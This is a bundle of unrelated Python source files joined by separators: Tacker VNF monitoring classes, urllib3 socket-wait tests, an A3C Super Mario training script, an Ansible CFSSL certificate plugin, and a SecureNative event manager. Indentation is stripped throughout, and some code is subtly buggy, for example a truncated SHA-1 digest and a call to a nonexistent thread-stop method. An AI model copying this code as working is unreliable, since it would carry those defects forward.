params['mgmt_ip'] = mgmt_ips[vdu]
driver_return = self.monitor_call(driver,
hosting_vnf['vnf'],
params)
LOG.debug('driver_return %s', driver_return)
if driver_return in actions:
action = actions[driver_return]
hosting_vnf['action_cb'](action, vdu_name=vdu)
def mark_dead(self, vnf_id):
VNFMonitor._hosting_vnfs[vnf_id]['dead'] = True
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._monitor_manager.invoke(
driver, method, **kwargs)
def monitor_get_config(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_url(self, vnf_dict):
return self._invoke(
vnf_dict, monitor=self, vnf=vnf_dict)
def monitor_call(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFAppMonitor(object):
"""VNF App monitor"""
OPTS = [
cfg.ListOpt(
'app_monitor_driver', default=['zabbix'],
help=_('App monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
def __init__(self):
self._application_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.app_monitor.drivers',
cfg.CONF.tacker.app_monitor_driver)
def _create_app_monitoring_dict(self, dev_attrs, mgmt_ip_address):
app_policy = 'app_monitoring_policy'
appmonitoring_dict = ast.literal_eval(
dev_attrs[app_policy].decode('utf-8'))
vdulist = appmonitoring_dict['vdus'].keys()
for vduname in vdulist:
temp = ast.literal_eval(mgmt_ip_address)
appmonitoring_dict['vdus'][vduname]['mgmt_ip'] = temp[vduname]
return appmonitoring_dict
def create_app_dict(self, context, vnf_dict):
dev_attrs = vnf_dict['attributes']
mgmt_ip_address = vnf_dict['mgmt_ip_address'].decode("utf-8")
return self._create_app_monitoring_dict(dev_attrs, mgmt_ip_address)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._application_monitor_manager.\
invoke(driver, method, **kwargs)
def add_to_appmonitor(self, applicationvnfdict, vnf_dict):
        vdunode = list(applicationvnfdict['vdus'].keys())  # keys() is not indexable on Python 3
        driver = applicationvnfdict['vdus'][vdunode[0]]['name']
kwargs = applicationvnfdict
return self._invoke(driver, vnf=vnf_dict, kwargs=kwargs)
class VNFAlarmMonitor(object):
"""VNF Alarm monitor"""
OPTS = [
cfg.ListOpt(
'alarm_monitor_driver', default=['ceilometer'],
help=_('Alarm monitoring driver to communicate with '
'Hosting VNF/logical service '
'instance tacker plugin will use')),
]
cfg.CONF.register_opts(OPTS, 'tacker')
# get alarm here
def __init__(self):
self._alarm_monitor_manager = driver_manager.DriverManager(
'tacker.tacker.alarm_monitor.drivers',
cfg.CONF.tacker.alarm_monitor_driver)
def update_vnf_with_alarm(self, plugin, context, vnf, policy_dict):
triggers = policy_dict['triggers']
alarm_url = dict()
for trigger_name, trigger_dict in triggers.items():
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = trigger_name
driver = trigger_dict['event_type']['implementation']
# TODO(Tung Doan) trigger_dict.get('actions') needs to be used
policy_action = trigger_dict.get('action')
if len(policy_action) == 0:
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR,
"Alarm not set: policy action missing")
return
# Other backend policies with the construct (policy, action)
# ex: (SP1, in), (SP1, out)
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s-%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(policy_action):
filters = {'name': policy_action_name}
bkend_policies =\
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
bkend_policy = bkend_policies[0]
if bkend_policy['type'] == constants.POLICY_SCALING:
cp = trigger_dict['condition'].\
get('comparison_operator')
scaling_type = 'out' if cp == 'gt' else 'in'
policy_action[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple action. Ex: respawn % notify
action_name = '%'.join(policy_action)
params['mon_policy_action'] = action_name
alarm_url[trigger_name] =\
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR, details)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
mon_prop = trigger['trigger']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
trigger_name, trigger_dict = list(mon_prop.items())[0]
driver = trigger_dict['event_type']['implementation']
return self.process_alarm(driver, vnf, alarm_dict)
def _invoke(self, driver, **kwargs):
method = inspect.stack()[1][3]
return self._alarm_monitor_manager.invoke(
driver, method, **kwargs)
def call_alarm_url(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
def process_alarm(self, driver, vnf_dict, kwargs):
return self._invoke(driver,
vnf=vnf_dict, kwargs=kwargs)
class VNFReservationAlarmMonitor(VNFAlarmMonitor):
"""VNF Reservation Alarm monitor"""
def update_vnf_with_reservation(self, plugin, context, vnf, policy_dict):
alarm_url = dict()
def create_alarm_action(action, action_list, scaling_type):
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = action
driver = 'ceilometer'
def _refactor_backend_policy(bk_policy_name, bk_action_name):
policy = '%(policy_name)s%(action_name)s' % {
'policy_name': bk_policy_name,
'action_name': bk_action_name}
return policy
for index, policy_action_name in enumerate(action_list):
filters = {'name': policy_action_name}
bkend_policies = \
plugin.get_vnf_policies(context, vnf['id'], filters)
if bkend_policies:
if constants.POLICY_SCALING in str(bkend_policies[0]):
action_list[index] = _refactor_backend_policy(
policy_action_name, scaling_type)
# Support multiple action. Ex: respawn % notify
action_name = '%'.join(action_list)
params['mon_policy_action'] = action_name
alarm_url[action] = \
self.call_alarm_url(driver, vnf, params)
details = "Alarm URL set successfully: %s" % alarm_url
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR,
details)
before_end_action = policy_dict['reservation']['before_end_actions']
end_action = policy_dict['reservation']['end_actions']
start_action = policy_dict['reservation']['start_actions']
scaling_policies = \
plugin.get_vnf_policies(
context, vnf['id'], filters={
'type': constants.POLICY_SCALING})
if len(scaling_policies) == 0:
raise exceptions.VnfPolicyNotFound(
policy=constants.POLICY_SCALING, vnf_id=vnf['id'])
for scaling_policy in scaling_policies:
# validating start_action for scale-out policy action
if scaling_policy['name'] not in start_action:
raise exceptions.Invalid(
'Not a valid template: start_action must contain'
' %s as scaling-out action' % scaling_policy['name'])
# validating before_end and end_actions for scale-in policy action
if scaling_policy['name'] not in before_end_action:
if scaling_policy['name'] not in end_action:
raise exceptions.Invalid(
'Not a valid template:'
' before_end_action or end_action'
' should contain scaling policy: %s'
% scaling_policy['name'])
for action in constants.RESERVATION_POLICY_ACTIONS:
scaling_type = "-out" if action == 'start_actions' else "-in"
create_alarm_action(action, policy_dict[
'reservation'][action], scaling_type)
return alarm_url
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
driver = 'ceilometer'
return self.process_alarm(driver, vnf, alarm_dict)
class VNFMaintenanceAlarmMonitor(VNFAlarmMonitor):
"""VNF Maintenance Alarm monitor"""
def update_vnf_with_maintenance(self, vnf, vdu_names):
maintenance = dict()
vdus = dict()
params = dict()
params['vnf_id'] = vnf['id']
params['mon_policy_name'] = 'maintenance'
params['mon_policy_action'] = vnf['tenant_id']
driver = 'ceilometer'
url = self.call_alarm_url(driver, vnf, params)
maintenance['url'] = url[:url.rindex('/')]
vdu_names.append('ALL')
for vdu in vdu_names:
access_key = ''.join(
random.SystemRandom().choice(
string.ascii_lowercase + string.digits)
for _ in range(8))
vdus[vdu] = access_key
maintenance.update({'vdus': vdus})
details = "Alarm URL set successfully: %s" % maintenance['url']
vnfm_utils.log_events(t_context.get_admin_context(), vnf,
constants.RES_EVT_MONITOR, details)
return maintenance
def process_alarm_for_vnf(self, vnf, trigger):
"""call in plugin"""
params = trigger['params']
alarm_dict = dict()
alarm_dict['alarm_id'] = params['data'].get('alarm_id')
alarm_dict['status'] = params['data'].get('current')
driver = 'ceilometer'
return self.process_alarm(driver, vnf, alarm_dict)
|
test_wait.py
|
import signal
import threading
import time
from socket import socket, socketpair
from types import FrameType
from typing import Callable, Generator, List, Tuple
import pytest
from urllib3.util.wait import (
_have_working_poll,
poll_wait_for_socket,
select_wait_for_socket,
wait_for_read,
wait_for_socket,
wait_for_write,
)
TYPE_SOCKET_PAIR = Tuple[socket, socket]
TYPE_WAIT_FOR = Callable[..., bool]
@pytest.fixture
def spair() -> Generator[TYPE_SOCKET_PAIR, None, None]:
a, b = socketpair()
yield a, b
a.close()
b.close()
variants: List[TYPE_WAIT_FOR] = [wait_for_socket, select_wait_for_socket]
if _have_working_poll():
variants.append(poll_wait_for_socket)
@pytest.mark.parametrize("wfs", variants)
def test_wait_for_socket(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
with pytest.raises(RuntimeError):
wfs(a, read=False, write=False)
assert not wfs(a, read=True, timeout=0)
assert wfs(a, write=True, timeout=0)
b.send(b"x")
assert wfs(a, read=True, timeout=0)
assert wfs(a, read=True, timeout=10)
assert wfs(a, read=True, timeout=None)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wfs(a, write=True, timeout=0)
# But if we ask for read-or-write, that succeeds
assert wfs(a, read=True, write=True, timeout=0)
# Unless we read from it
assert a.recv(1) == b"x"
assert not wfs(a, read=True, write=True, timeout=0)
# But if the remote peer closes the socket, then it becomes readable
b.close()
assert wfs(a, read=True, timeout=0)
# Waiting for a socket that's actually been closed is just a bug, and
# raises some kind of helpful exception (exact details depend on the
# platform).
with pytest.raises(Exception):
wfs(b, read=True)
def test_wait_for_read_write(spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
assert not wait_for_read(a, 0)
assert wait_for_write(a, 0)
b.send(b"x")
assert wait_for_read(a, 0)
assert wait_for_write(a, 0)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wait_for_write(a, 0)
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: FrameType) -> None:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
wfs(a, read=True, timeout=1)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_zero_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: FrameType) -> None:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
try:
# Start delivering SIGALRM 1000 times per second,
# to trigger race conditions such as
# https://github.com/urllib3/urllib3/issues/1396.
signal.setitimer(signal.ITIMER_REAL, 0.001, 0.001)
# Hammer the system call for a while to trigger the
# race.
for i in range(100000):
wfs(a, read=True, timeout=0)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_infinite_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: FrameType) -> None:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
def make_a_readable_after_one_second() -> None:
time.sleep(1)
b.send(b"x")
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
thread = threading.Thread(target=make_a_readable_after_one_second)
thread.start()
wfs(a, read=True)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
thread.join()
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
|
train.py
|
"""
@author: Viet Nguyen <[email protected]>
From: https://github.com/uvipen/Super-mario-bros-A3C-pytorch
Modified for Benchmarking Reinforcement Learning Algorithms in NES Games by Erin-Louise Connolly
"""
import os
import argparse
import torch
from src.env import create_train_env
from src.model import ActorCritic
from src.optimizer import GlobalAdam
from src.process import local_train, local_test
import torch.multiprocessing as _mp
import shutil,csv,time,sys
from datetime import datetime
import numpy as np
from src.helpers import JoypadSpace, SIMPLE_MOVEMENT, COMPLEX_MOVEMENT, RIGHT_ONLY
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['DISPLAY'] = ':1'
def get_args():
timestr = time.strftime("%Y%m%d-%H%M%S")
parser = argparse.ArgumentParser(
"""Implementation of model described in the paper: Asynchronous Methods for Deep Reinforcement Learning for Super Mario Bros""")
parser.add_argument("--world", type=int, default=1)
parser.add_argument("--stage", type=int, default=1)
parser.add_argument("--action_type", type=str, default="complex")
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=0.9, help='discount factor for rewards')
parser.add_argument('--tau', type=float, default=1.0, help='parameter for GAE')
parser.add_argument('--beta', type=float, default=0.01, help='entropy coefficient')
parser.add_argument("--num_local_steps", type=int, default=50)
parser.add_argument("--num_global_steps", type=int, default=2e6)
parser.add_argument("--num_processes", type=int, default=4)
parser.add_argument("--save_interval", type=int, default=2000, help="Number of steps between savings")
parser.add_argument("--max_actions", type=int, default=200, help="Maximum repetition steps in test phase")
parser.add_argument("--log_path", type=str, default="tensorboard/a3c_super_mario_bros")
parser.add_argument("--timestr", type=str, default=timestr)
parser.add_argument("--saved_path", type=str, default="trained_models/"+ timestr)
parser.add_argument("--load_from_previous_stage", type=bool, default=False,
help="Load weight from previous trained stage")
parser.add_argument("--use_gpu", type=bool, default=True)
args = parser.parse_args()
return args
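# Illustrative invocation (values are examples only):
#   python train.py --world 1 --stage 1 --action_type complex --num_processes 4
# Note that argparse's type=bool treats any non-empty string as True, so
# --use_gpu and --load_from_previous_stage are effectively controlled by
# editing their defaults rather than by passing "False" on the command line.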
def train(opt):
seed = 123
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
print("using cuda")
else:
torch.manual_seed(seed)
print("not using cuda")
opt.saved_path = os.getcwd() + '/arkanoid/a3c/' + opt.saved_path
if opt.action_type == "right":
actions = RIGHT_ONLY
elif opt.action_type == "simple":
actions = SIMPLE_MOVEMENT
else:
actions = COMPLEX_MOVEMENT
    start_time = time.time()
    now = datetime.now()
    current_time = now.strftime("%H:%M:%S")
if not os.path.isdir(opt.saved_path):
os.makedirs(opt.saved_path)
mp = _mp.get_context("spawn")
env, num_states, num_actions = create_train_env(opt.world, opt.stage,opt.action_type)
global_model = ActorCritic(num_states, num_actions)
if torch.cuda.is_available():
global_model.cuda()
global_model.share_memory()
optimizer = GlobalAdam(global_model.parameters(), lr=opt.lr)
processes = []
for index in range(opt.num_processes):
if index == 0:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer, True))
else:
process = mp.Process(target=local_train, args=(index, opt, global_model, optimizer))
process.start()
processes.append(process)
process = mp.Process(target=local_test, args=(opt.num_processes, opt, global_model))
process.start()
processes.append(process)
for process in processes:
process.join()
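# Hedged sketch (not part of the original script): the core pattern used in
# train() above -- a model moved to shared memory and workers launched from a
# "spawn" context -- reduced to its essentials. Names are illustrative only.
def _example_shared_worker(rank, shared_model):
    # rank mirrors the "index" argument passed to local_train above
    with torch.no_grad():
        shared_model.weight.add_(1.0)  # every worker mutates the same storage

def _example_shared_model_workers(num_workers=2):
    ctx = _mp.get_context("spawn")
    model = torch.nn.Linear(4, 2)
    model.share_memory()  # parameters now live in shared memory
    workers = [ctx.Process(target=_example_shared_worker, args=(rank, model)) for rank in range(num_workers)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    return model  # weight reflects the workers' in-place updates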
if __name__ == "__main__":
opt = get_args()
train(opt)
|
cfssl.py
|
# Ansible action plugin to generate certificates securely using a remote CFSSL
# service.
#
# * Mutual TLS auth between client and server.
# * Certificates are generated on the master (local machine) and stored
# in variables.
# * Private keys never stored on local disk.
#
# This action does not execute any modules. The certificate and private key
# are returned as part of the result.
import hashlib, json, os, re, sys, threading, traceback
from collections import namedtuple
from urlparse import urlparse
from ansible.plugins.action import ActionBase
from ansible.utils.display import Display
from concurrent.futures import Future
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from OpenSSL import SSL
from twisted.internet import defer, reactor, ssl, task
from twisted.python import threadable
from twisted.web.client import getPage
BACKEND = default_backend()
ENCODING_PEM = serialization.Encoding.PEM
FORMAT_PKCS8 = serialization.PrivateFormat.PKCS8
display = Display()
threadable.init(1)
E_HOSTPORT = 'expected HOST:PORT but got %r'
E_LOADPEM = 'failed to load %r PEM: %s'
E_SHA1ERR = '%s SHA-1 mismatch. Expected %s got %s'
TLS_OPTIONS = dict(extraCertificateOptions = dict(method = SSL.TLSv1_2_METHOD))
PEM_TYPES = (
'CERTIFICATE',
'PRIVATE KEY',
'EC PRIVATE KEY',
'RSA PRIVATE KEY',
'DH PARAMETERS'
)
RE_SP = re.compile(r'\s+', re.M)
RE_SERVICE = re.compile(r'[\w.-]+:\d+')
RE_PEM = re.compile(
    r'-----BEGIN (' +
    '|'.join(PEM_TYPES) +
    r')-----\r?\n(.+?)\r?\n-----END \1-----\r?\n?', re.DOTALL)
Pem = namedtuple('Pem', 'raw, type, bytes')
# The Twisted reactor is started on a background thread, and futures are used
# to adapt the synchronous Ansible code to the asynchronous Twisted code.
#
# Twisted is used because its TLS implementation can establish a mutual TLS
# client connection with the PEM private key and certificate handed to OpenSSL
# as in-memory values rather than files on disk: the CA client's private key
# must never touch the local or remote disk.
_REACTOR = None
def start_reactor():
'''
Start the reactor on a background thread so our actions are executed on
the main thread.
'''
global _REACTOR
if reactor.running:
return
if not _REACTOR or not _REACTOR.isAlive():
run = lambda: reactor.run(installSignalHandlers=False)
_REACTOR = threading.Thread(name='Reactor', target=run)
_REACTOR.start()
def stop_reactor():
reactor.callFromThread(reactor.stop)
def invoke(func, *args, **kw):
'''
Invokes a function that (may or may not) call twisted asynchronous code
and adapts the (possibly deferred) result to a Future.
'''
future = Future()
@defer.inlineCallbacks
def adapt_future():
try:
res = yield defer.maybeDeferred(func, *args, **kw)
future.set_result(res)
except Exception as e:
future.set_exception(e)
reactor.callFromThread(adapt_future)
return future
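# Hedged usage sketch (not part of the original plugin): how invoke() is meant
# to be driven from synchronous Ansible code. The deferred work runs on the
# reactor thread, and .result() blocks the calling thread until it fires.
def _example_invoke_usage():
    def delayed_value():
        # task.deferLater returns a Deferred that fires with 'done' after 0.1s.
        return task.deferLater(reactor, 0.1, lambda: 'done')
    start_reactor()
    try:
        return invoke(delayed_value).result()  # -> 'done'
    finally:
        stop_reactor()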
class Client(object):
'''
Mutual TLS CFSSL client to issue new certificates.
'''
def __init__(self, base_url, profile, cert_key, ca_bundle):
self.base_url = base_url
self.profile = profile
self.cert_key = cert_key
self.ca_bundle = ca_bundle
def get_host(self):
u = urlparse(self.base_url)
parts = u.netloc.split(':', 1)
return unicode(parts[0])
@defer.inlineCallbacks
def getcert(self, csr):
host = self.get_host()
trustRoot = ssl.trustRootFromCertificates(self.ca_bundle)
opts = ssl.optionsForClientTLS(host, trustRoot, self.cert_key, **TLS_OPTIONS)
req = {'request': csr, 'profile': self.profile}
url = self.base_url + '/api/v1/cfssl/newcert'
res = yield getPage(url,
contextFactory=opts,
method='POST',
postdata=json.dumps(req))
defer.returnValue(res)
def pem_split(s):
return list(Pem(m.group(0), m.group(1), m.group(2)) for m in RE_PEM.finditer(s))
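# Illustrative sketch (not part of the original plugin): pem_split() turns a
# concatenated PEM bundle into Pem namedtuples, one per BEGIN/END block.
def _example_pem_split():
    bundle = (
        '-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n'
        '-----BEGIN RSA PRIVATE KEY-----\nBBBB\n-----END RSA PRIVATE KEY-----\n'
    )
    pems = pem_split(bundle)
    assert [p.type for p in pems] == ['CERTIFICATE', 'RSA PRIVATE KEY']
    assert pems[0].bytes == 'AAAA'
    return pems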
def fail(msg):
return dict(failed=True, msg=msg)
def format_msg(rec):
r = ''
for m in rec.get('messages', []):
r += '%s: %s\n' % (m.get('code'), m.get('message'))
return r
def getdeep(d, key, defval=''):
for k in key.split('.'):
d = d.get(k, {})
return d if d else defval
def sha1(data):
return hashlib.sha1(data).hexdigest()[1:].upper()
def encrypt_private_key(key_pem, passphrase):
key_pem = key_pem.encode('ascii')
passphrase = passphrase.encode('utf-8')
key = serialization.load_pem_private_key(key_pem, None, BACKEND)
return key.private_bytes(ENCODING_PEM, FORMAT_PKCS8,
serialization.BestAvailableEncryption(passphrase))
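# Illustrative sketch (not part of the plugin): encrypt_private_key() applied to
# a freshly generated EC key, using only the `cryptography` primitives already
# imported above. It only demonstrates the PKCS#8 passphrase-encryption step.
def _example_encrypt_roundtrip(passphrase='s3cret'):
    from cryptography.hazmat.primitives.asymmetric import ec
    key = ec.generate_private_key(ec.SECP256R1(), BACKEND)
    pem = key.private_bytes(ENCODING_PEM, FORMAT_PKCS8, serialization.NoEncryption())
    encrypted = encrypt_private_key(pem, passphrase)
    # The encrypted PEM loads back only when the same passphrase is supplied.
    serialization.load_pem_private_key(encrypted, passphrase, BACKEND)
    return encrypted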
def extract_certkey(rec):
r = rec.get('result', {})
# extract the cert, key and csr values
cert = getdeep(r, 'certificate', '')
key = getdeep(r, 'private_key', '')
csr = getdeep(r, 'certificate_request', '')
# TODO: Validate the signatures on the certificate and csr.
return (cert, key, csr), None
class ActionModule(ActionBase):
ARGS = set(['service', 'auth', 'profile', 'csr'])
AUTH_ARGS = set(['cert', 'key', 'cacert'])
TRANSFER_FILES = False
def __init__(self, *n, **kw):
# force 'no_log' to be true, since we want to return the private key as
# a result variable and don't ever want it logged.
        # TODO: cleaner way to do this?
ctx = kw.get('play_context')
if ctx:
ctx.no_log = True
ActionBase.__init__(self, *n, **kw)
def arg(self, name):
return self._task.args.get(name, None)
def check_args(self, names, collection):
for arg in names:
if arg not in collection:
return fail('%r is a required argument' % arg)
def load_file(self, path):
root = self._loader.get_basedir()
if self._task._role is not None:
root = self._task._role._role_path
realpath = self._loader.path_dwim_relative(root, 'files', path)
return open(realpath, 'rb').read()
def run(self, tmp=None, task_vars=None):
try:
return self._run(tmp, task_vars)
except Exception as e:
# since this action always runs in no_log=True mode, manually
# print the real exception, if any.
display.error(traceback.format_exc())
return fail('Failed!')
def _run(self, tmp=None, task_vars=None):
err = self.check_args(self.ARGS, self._task.args)
if err:
return err
getarg = lambda n, d=None: self._task.args.get(n, d)
service = getarg('service')
auth = getarg('auth')
profile = getarg('profile')
csr_arg = getarg('csr')
show = getarg('show', False)
if isinstance(show, basestring):
show = show in ('yes','true','1')
# optional passphrase to protect generated private key
passphrase = getarg('passphrase')
err = self.check_args(self.AUTH_ARGS, auth)
if err:
return err
cert = auth.get('cert')
key = auth.get('key')
cacert = auth.get('cacert')
# validate some args
if not RE_SERVICE.match(service):
            return fail(E_HOSTPORT % service)
service = service.encode('utf-8')
try:
cert_key = ssl.PrivateCertificate.loadPEM(cert + '\n' + key)
except Exception as e:
return fail(E_LOADPEM % ('cert/key', traceback.format_exc()))
try:
ca_bundle = [ssl.Certificate.loadPEM(p.raw) for p in pem_split(cacert)]
except Exception as e:
return fail(E_LOADPEM % ('cacert', traceback.format_exc()))
        if isinstance(csr_arg, dict):
            # csr definition is an inline yaml object
            csr = csr_arg
        elif isinstance(csr_arg, basestring):
            # assume the csr string is a path on disk
            data = self.load_file(csr_arg)
            csr = json.loads(data)
        else:
            return fail('csr must be an inline mapping or a path to a JSON file')
# build the client talking to the service url
base_url = 'https://%s' % service
client = Client(base_url, profile, cert_key, ca_bundle)
# contact the cfssl service to issue a new certificate
try:
start_reactor()
data = invoke(client.getcert, csr).result()
record = json.loads(data)
finally:
stop_reactor()
# extract warning messages, if any, from cfssl result
msg = format_msg(record)
if msg:
display.warning('CFSSL MESSAGES :' + msg)
ck, err = extract_certkey(record)
if err:
msg = 'FAILED TO EXTRACT VALUES: %s' % err
display.error(msg)
return fail(msg)
cert, key, csr = ck
if not cert:
return fail('Failed to generate CERTIFICATE')
if not key:
return fail('Failed to generate PRIVATE KEY')
if not csr:
return fail('Failed to generate CSR')
# optional passphrase encryption with PKCS#8 AES256 CBC
if passphrase:
key = encrypt_private_key(key, passphrase)
if show:
display.display(cert + '\n\n' + key + '\n\n' + csr)
# return the certificate and key
return dict(cert = cert, key = key, csr = csr)
|
event_manager.py
|
import json
import threading
import time
from securenative.config.securenative_options import SecureNativeOptions
from securenative.http.securenative_http_client import SecureNativeHttpClient
from securenative.logger import Logger
class QueueItem:
def __init__(self, url, body, retry):
self.url = url
self.body = body
self.retry = retry
class EventManager:
def __init__(self, options=SecureNativeOptions(), http_client=None):
if options.api_key is None:
raise ValueError('API key cannot be None, please get your API key from SecureNative console.')
if not http_client:
self.http_client = SecureNativeHttpClient(options)
else:
self.http_client = http_client
        self.queue = list()
        self.options = options
        self.send_enabled = False
        self.attempt = 0
        self.coefficients = [1, 1, 2, 3, 5, 8, 13]
        self.interval = options.interval
        # Start the background worker only after every attribute it reads is set,
        # and keep the Thread handle so it is not accidentally discarded.
        self.thread = threading.Thread(target=self.run, daemon=True)
        self.thread.start()
def send_async(self, event, resource_path):
if self.options.disable:
Logger.warning("SDK is disabled. no operation will be performed")
return
item = QueueItem(
resource_path,
json.dumps(EventManager.serialize(event)),
False
)
self.queue.append(item)
if self._is_queue_full():
            self.queue = self.queue[:len(self.queue) - 1]
def flush(self):
for item in self.queue:
self.http_client.post(item.url, item.body)
def send_sync(self, event, resource_path):
if self.options.disable:
Logger.warning("SDK is disabled. no operation will be performed")
return
Logger.debug("Attempting to send event {}".format(event))
res = self.http_client.post(
resource_path,
json.dumps(EventManager.serialize(event))
)
if res is None or res.status_code != 200:
Logger.info("SecureNative failed to call endpoint {} with event {}.".format(resource_path, event))
return res
def _is_queue_full(self):
return len(self.queue) > self.options.max_events
def run(self):
while True:
if len(self.queue) > 0 and self.send_enabled:
                for item in list(self.queue):  # iterate over a copy: items may be removed below
try:
res = self.http_client.post(item.url, item.body)
if res.status_code == 401:
item.retry = False
elif res.status_code != 200:
item.retry = True
self.queue.remove(item)
Logger.debug("Event successfully sent; {}".format(item.body))
except Exception as e:
Logger.error("Failed to send event; {}".format(e))
if item.retry:
if len(self.coefficients) == self.attempt + 1:
self.attempt = 0
back_off = self.coefficients[self.attempt] * self.options.interval
Logger.debug("Automatic back-off of {}".format(back_off))
self.send_enabled = False
time.sleep(back_off)
self.send_enabled = True
time.sleep(self.interval/1000)
def start_event_persist(self):
Logger.debug("Starting automatic event persistence")
if self.options.auto_send or self.send_enabled:
self.send_enabled = True
else:
Logger.debug("Automatic event persistence is disabled, you should persist events manually")
def stop_event_persist(self):
if self.send_enabled:
Logger.debug("Attempting to stop automatic event persistence")
try:
self.flush()
if self.thread:
self.thread.stop()
except ValueError as e:
Logger.error("Could not stop event scheduler; {}".format(e))
Logger.debug("Stopped event persistence")
@staticmethod
def serialize(obj):
return {
"rid": obj.rid,
"eventType": obj.event_type if isinstance(obj.event_type, str) else obj.event_type.value,
"userId": obj.user_id,
"userTraits": {
"name": obj.user_traits.name if obj.user_traits else "",
"email": obj.user_traits.email if obj.user_traits else "",
"phone": obj.user_traits.phone if obj.user_traits else "",
"createdAt": obj.user_traits.created_at if obj.user_traits else "",
},
"request": {
"cid": obj.request.cid if obj.request else "",
"vid": obj.request.vid if obj.request else "",
"fp": obj.request.fp if obj.request else "",
"ip": obj.request.ip if obj.request else "",
"remoteIp": obj.request.remote_ip if obj.request else "",
"method": obj.request.method if obj.request else "",
"url": obj.request.url if obj.request else "",
"headers": obj.request.headers if obj.request else None
},
"timestamp": obj.timestamp,
"properties": obj.properties,
}
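# Hedged sketch (not part of the SDK): the queue/flush contract above, shown with
# a stub HTTP client. No real SecureNative objects are constructed here; the stub
# only mimics the single post(url, body) call that EventManager.flush() performs.
class _StubHttpClient:
    def __init__(self):
        self.posted = []

    def post(self, url, body):
        self.posted.append((url, body))
        return None

def _example_flush_contract():
    stub = _StubHttpClient()
    queue = [QueueItem("/collector/api/v1/track", '{"eventType": "sn.user.login"}', False)]
    # Mirrors EventManager.flush(): every queued item is posted exactly once.
    for item in queue:
        stub.post(item.url, item.body)
    return stub.posted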
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
